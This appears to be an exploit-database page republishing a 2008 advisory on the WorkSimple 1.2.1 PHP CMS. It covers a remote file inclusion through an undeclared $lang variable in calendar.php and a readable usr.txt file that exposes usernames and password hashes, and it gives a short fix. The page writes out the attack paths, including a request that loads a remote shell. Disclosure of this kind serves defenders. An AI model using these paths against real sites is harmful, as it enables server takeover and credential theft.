header-logo
Suggest Exploit
vendor:
WorkSimple
by:
Osirys
7.5
CVSS
HIGH
Remote File Inclusion / Sensitive Data Disclosure
N/A
CWE
Product Name: WorkSimple
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

WorkSimple 1.2.1 Remote File Inclusion / Sensitive Data Disclosure

Bugged file is: /[path]/calendar.php. The $lang variable is not declared, so it can be set directly from GET. Exploit: /[path]/calendar.php?lang=[remote_txt_shell]. Sensitive Data Disclosure: In this cms, when an user register himself, the cms puts informations like username and password on a .txt file. So, just going on it, we can get sensitive data like username and passoword. Exploit: /[path]/data/usr.txt

Mitigation:

Just declare $lang, for example in /[path]/data/conf.php
Source

Exploit-DB raw data:

[START]

#########################################################################################
[0x01] Informations:

Script         : WorkSimple 1.2.1
Download       : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1
Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
Author         : Osirys
Contact        : osirys[at]live[dot]it
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay


#########################################################################################
[0x02] Bug:[Remote File Inclusion]
######

Bugged file is: /[path]/calendar.php

[CODE]
<?PHP require 'data/conf.php'; //Include the global config ?>
	<?php include("$lang") ?>
[/CODE]

$lang variable is not declared, I thought it was declared on conf.php, but it's not.
So we can set the $lang value directly from GET.

FIX : Just declare $lang, for example in /[path]/data/conf.php


[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell]

########################################################################################
[0x03] Bug:[Sensitive Data Disclosure]
######

In this cms, when an user register himself, the cms puts informations like username and
password on a .txt file. So, just going on it, we can get sensitive data like username
and passoword. username:md5_hash


[!] EXPLOIT: /[path]/data/usr.txt

#########################################################################################

[/END]

# milw0rm.com [2008-12-15]